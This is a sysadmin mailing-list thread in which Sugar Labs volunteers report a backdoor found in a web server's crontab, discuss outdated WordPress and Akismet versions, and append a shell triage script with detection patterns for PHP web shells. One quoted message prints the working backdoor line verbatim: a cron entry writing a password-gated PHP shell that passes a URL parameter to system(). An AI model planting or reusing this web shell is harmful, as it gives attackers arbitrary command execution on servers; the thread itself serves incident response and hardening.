[Systems] Found a backdoor

Samuel Cantero scanterog at gmail.com
Sun Mar 6 20:02:55 EST 2016


Hi Walter,

I have updated the WP version on your site to the last one (4.4.2). I also
uploaded the last version of the akismet plugin to the wp plugin folder. In
theory, you should activate it through the wp admin interface in order to
make it work again. If you find something broken just let me know.

Best regards,

Samuel C.

On Tue, Mar 1, 2016 at 10:55 PM, Samuel Cantero <scanterog at gmail.com> wrote:

> If you want to keep it, I can do the job. I will try to do it this
> weekend.
>
> Best regards,
>
> Samuel C.
>
> On Tue, Mar 1, 2016 at 10:49 PM, Walter Bender <walter.bender at gmail.com>
> wrote:
>
>> Let's shut it down for the time being. I've been updating the wiki but
>> not my blog since the attack last year anyway.
>>
>> -walter
>>
>> On Tue, Mar 1, 2016 at 7:57 PM, Bernie Innocenti <bernie at codewiz.org>
>> wrote:
>>
>>> +walter
>>>
>>> Can we appoint an official maintainer for walterbender.org? Sorry for
>>> not stepping up myself, but I'm overwhelmed by work related things and
>>> trying to reduce my sysadmin load.
>>>
>>> On 03/01/2016 02:50 PM, Samuel Cantero wrote:
>>> > On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <bernie at codewiz.org
>>> > <mailto:bernie at codewiz.org>> wrote:
>>> >
>>> >     On 02/25/2016 04:09 AM, Sebastian Silva wrote:
>>> >     > Remember in June we had an incident with a broken Wordpress site.
>>> >     > I switched to static generator since then.
>>> >     >
>>> >     > +1 on containers, just learning more about them and finding them
>>> >     > fascinating. Count me in on containerizing everything.
>>> >     >
>>> >     > I'm not aware of other wordpress sites. Maybe walter's blog?
>>> >     > Wordpress is a PIA IMHO.
>>> >
>>> >     Yes, WP is riddled with security holes. Back in October, Samuel helped
>>> >     Walter upgrade walterbender.org <http://walterbender.org> on sunjammer.
>>> >     Samuel, can you confirm that the WP instance is now fully patched and
>>> >     locked down?
>>> >
>>> >
>>> > The WP version on the walterbender.org <http://walterbender.org> site is
>>> > 4.3.1. The latest WP version is 4.4.2. I have checked the WP change log
>>> > and we can find this:
>>> >
>>> > 4.4.1 => WordPress versions 4.4 and earlier are affected by a
>>> cross-site
>>> > scripting vulnerability that could allow a site to be compromised.
>>> >
>>> > 4.4.2 => WordPress versions 4.4.1 and earlier are affected by two
>>> > security issues: a possible SSRF for certain local URIs, and an open
>>> > redirection attack.
>>> >
>>> > This site also uses the 2.5.9 akismet plugin. The last version is 3.1.7.
>>> > Significant information on the release notes:
>>> >
>>> >   * Pre-emptive security improvements to ensure that the Akismet plugin
>>> >     can't be used by attackers to compromise a WordPress installation.
>>> >   * Closes a potential XSS vulnerability.
>>> >
>>> > Of course, every version has a lot of bug fixes. We definitely should
>>> > upgrade it and test that nothing breaks on the walterbender.org
>>> > <http://walterbender.org> site.
>>> >
>>> > Who is in charge of upgrading the other WP sites?
>>> >
>>> > Regards,
>>> >
>>> > Samuel C.
>>> >
>>> >
>>> >
>>> >
>>> >     > Regards,
>>> >     > Sebastian
>>> >     >
>>> >     >
>>> >     > On 25/02/16 04:47, Bernie Innocenti wrote:
>>> >     >> While I was looking for cronjobs in /var/spool/cron/crontabs/, I found
>>> >     >> that www-data was executing commands like these:
>>> >     >>
>>> >     >> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]); @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
>>> >     >>
>>> >     >> Did you spot the system()? This executes arbitrary commands specified
>>> >     >> via the "localtime" url parameter. Uh-oh.
>>> >     >>
>>> >     >> There were about a dozen lines like the above, installing .cache.php in
>>> >     >> various virtualhosts. I kept a copy of the file in
>>> >     >> /root/www-data.backdoor. The file was last written on Jun 23 2015,
>>> >     >> which may correlate with the switch to the new website.
>>> >     >>
>>> >     >> I cleared the mess and searched the logs for requests containing
>>> >     >> "localtime", but couldn't find any. I wonder if they could filter the
>>> >     >> logs, since they were previously writable by www-data.
>>> >     >>
>>> >     >> Please watch out. We should ensure directories accessible over http are
>>> >     >> not writable by user www-data, especially those in which PHP and CGIs
>>> >     >> are enabled.
>>> >     >>
>>> >     >> Running several large sites under the same uid has always been a bad
>>> >     >> security practice, and looking forward we should keep migrating them to
>>> >     >> properly isolated containers.
>>> >     >>
>>> >     >> Finally, Wordpress is particularly dangerous and we should update and
>>> >     >> harden all instances. Can someone please take care of this? I'll do
>>> >     >> Mediawiki, which I know pretty well.
>>> >     >>
>>> >     >
>>> >     >
>>> >
>>> >
>>> >     --
>>> >      _ // Bernie Innocenti
>>> >      \X/  http://codewiz.org
>>> >     _______________________________________________
>>> >     Systems mailing list
>>> >     Systems at lists.sugarlabs.org <mailto:Systems at lists.sugarlabs.org>
>>> >     http://lists.sugarlabs.org/listinfo/systems
>>> >
>>> >
>>> >
>>> >
>>> >
>>>
>>>
>>> --
>>>  _ // Bernie Innocenti
>>>  \X/  http://codewiz.org
>>>
>>
>>
>>
>> --
>> Walter Bender
>> Sugar Labs
>> http://www.sugarlabs.org
>> <http://www.sugarlabs.org>
>>
>
>
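An added triage script (not from the thread or the Sugar Labs servers) that checks for the three things Bernie's message points at: crontab entries that write PHP into a web root, web-root directories writable by the web-server user, and PHP files that hand a request parameter to a shell-executing function. The web root path and the user name passed in are assumptions; run it against your own paths.

```shell
#!/bin/sh
# Triage helpers for a www-data crontab that drops a PHP shell into a web root.
# All paths and user names are caller-supplied assumptions; nothing here is
# taken from a real server.
set -u

# Reads crontab text on stdin and prints lines that redirect output into a
# .php file or embed PHP source. Returns 1 when anything matched, else 0.
suspicious_cron_entries() {
    hits=$(grep -E '>+[[:space:]]*[^[:space:]]*\.php([[:space:]]|$)|<\?php' || true)
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# Lists directories under $1 that user $2 (e.g. www-data) could write to:
# owned by that user with the owner-write bit, or world-writable.
# A hardened web root that serves PHP should print nothing here.
writable_dirs() {
    find "$1" -type d \( -perm -o=w -o \( -user "$2" -perm -u=w \) \) 2>/dev/null
}

# Lists PHP files under $1 that both call a shell-executing function and read
# a request parameter, the combination seen in the .cache.php backdoor.
webshell_candidates() {
    find "$1" -type f -name '*.php' 2>/dev/null | while IFS= read -r f; do
        grep -qE '(system|passthru|shell_exec|exec)[[:space:]]*\(' "$f" &&
        grep -qE '\$_(GET|POST|REQUEST|COOKIE)\[' "$f" &&
        printf '%s\n' "$f"
    done
}

# Example run (placeholder web root and user; adjust for your host):
#   crontab -u www-data -l | suspicious_cron_entries
#   writable_dirs /srv/www www-data
#   webshell_candidates /srv/www
```

Review anything `suspicious_cron_entries` prints before deleting it and keep a copy, as Bernie did, so the timestamps and content stay available for the log search.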